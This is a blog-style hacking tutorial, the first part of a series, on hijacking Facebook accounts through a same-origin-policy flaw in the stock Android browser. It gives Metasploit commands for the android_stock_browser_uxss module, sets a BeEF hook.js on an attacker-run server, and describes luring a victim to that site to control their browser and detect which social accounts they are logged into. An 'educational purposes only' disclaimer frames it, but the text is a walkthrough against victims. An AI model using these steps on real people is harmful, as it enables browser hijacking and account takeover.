How to Hack Facebook Part-I

 

HELLO AND WELCOME BACK GUYS TO MY NEW HACKING SERIES. THIS SERIES IS BASED ON FACEBOOK HACKING. THIS PART-I OF OUR FACEBOOK HACKING. AS I ALWAYS SAY THAT MY ALL POSTS FOR ONLY EDUCATIONAL PURPOSE ONLY. WE ARE NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES THAT YOU DO.

INTRODUCTION:

Facebook is one of the most secure applications on the Internet and, despite what you might read on the Internet, it is NOT easy to hack. In addition, most of those websites on the Internet willing to sell you a Facebook hack are scams. Don't give them any type of money!

If you want to hack Facebook, you need to invest some time into learning.

In this first entry in this series, we will use a flaw in the stock Android web browser that will provide us with access to the Facebook account. I hope it goes without saying that this hack will only work when the user has accessed their Facebook account from the stock Android browser, not the Facebook mobile app. Although Google is aware of this security flaw in their browser, it is not automatically patched or replaced on existing systems. As a result, this hack will work on most Android systems.

NOTE: HERE WE USE SOP (SAME-ORIGIN POLICY) TO HACK A                       FACEBOOK ACCOUNT.

REQUIREMENTS:

• KALI LINUX OPERATING SYSTEM.
• METASPLOIT TOOL IN KALI.
• BeEF TOOL.
• SOME SENSE TO UNDERSTAND THINGS WHAT WE ARE DOING. 

SAME-ORIGIN POLICY:

Same-origin policy (SOP) is one of the key security measures that every browser should meet. What it means is that browsers are designed so that webpages can't load code that is not part of their own resource. This prevents attackers from injecting code without the authorization of the website owner.

Unfortunately, the default Android browser can be hacked as it does not enforce the SOP policy adequately. In this way, an attacker can access the user's other pages that are open in the browser, among other things. This means that if we can get the user to navigate to our website and then send them some malicious code, we can then access other sites that are open in their browser, such as Facebook.

SO LET'S START GUYS.....

STEP 1 :

OPEN METASPLOIT BY TYPING FOLLOWING COMMAND

search platform:android stock browser

It will open like this.

STEP 2 :

Now we need to find Exploit for hack. So we type following command

search platform:android stock browser

Then it will show only one module like: "auxiliary/gather/android_stock_browser_uxss"

Now we need to load this module by following command

use auxiliary/gather/android_stock_browser_uxss

STEP 3 :

Now module has loaded so let's find some information on this module by following command.

info

As you can see from this info page, this exploit works against all stock Android browsers before Android 4.4 KitKat. It tells us that this module allows us to run arbitrary JavaScript in the context of the URL.

STEP 4 :

In this step let see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.

STEP 5 :

Now we need to open BeEF Tool in our Kali Machine.

STEP 6 :

Now we need to set JS to BeEF Hook. So back to metasploit Now.

We need to set the REMOTE_JS to the hook on BeEF. Of course, make certain you use the IP of the server that BeEF is running on by following command.

set REMOTE_JS http://192.168.1.107:3000/hook.js

Now we need to set the URIPATH to the root directory So Let's type following command:

set uripath /

STEP 7 :

Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.

run

STEP 8 :

Now we need to navigate the website from an android browser so we are replicating the behavior of the victim. When they navigate to the website hosting the hook, it will automatically inject the JavaScript into their browser and hook it. So, we need to use the stock browser on an Android device and go to 192.168.1.107:8080, or whatever the IP is of your website.

STEP 9 :

When the user/device visits our web server at 192.168.1.107, the BeEF JavaScript will hook their browser. It will show under the "Hooked Browser" explorer in BeEF. We now control their browser.

STEP 10 :

Now let's go back to BeEF and go to the "Commands" tab. Under the "Network" folder we find the "Detect Social Networks" command. This command will check to see whether the victim is authenticated to Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower right.

When we do so, BeEF will return for us the results. As you can see below, BeEF returned to us that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.

Now, we need to simply wait until the user is authenticated to Facebook and attempt this command again. Once they have authenticated to Facebook, we can direct a tab to open the user's Facebook page, which we will do in our next Facebook hack tutorial.

Share To Your Friends And Learn Together With Us

⚠️Nᴏᴛᴇ:- Tʜɪs ᴀʟʟ ɪɴғᴏʀᴍᴀᴛɪᴏɴ ᴘʀᴏᴠɪᴅᴇᴅ ʙʏ ᴜs ɪs ᴏɴʟʏ ғᴏʀ ᴍᴀᴋᴇ ʏᴏᴜ ᴍᴏʀᴇ ᴀᴡᴀʀᴇ ᴀɴᴅ sᴇᴄᴜʀᴇ ғʀᴏᴍ ᴛʜɪs ᴛʏᴘᴇ ᴏғ ʜᴀᴄᴋɪɴɢ ᴏʀ ᴄʀᴀᴄᴋɪɴɢ ᴀɴᴅ ɪғ ʏᴏᴜ ᴜsᴇ ɪᴛ ɪɴ ɪʟʟᴇɢᴀʟ ᴘᴜʀᴘᴏsᴇ ᴛʜᴇɴ ᴡᴇ ᴀʀᴇ ɴᴏᴛ ʀᴇsᴘᴏɴsɪʙʟᴇ ғᴏʀ ᴛʜᴀᴛ !

➖➖➖➖➖➖➖➖➖➖➖➖

👍ʜᴏᴘᴇ ʏᴏᴜ ɢᴜʏs ʟɪᴋᴇ ᴛʜɪs ᴘᴏsᴛ.

please give your feedback in comment.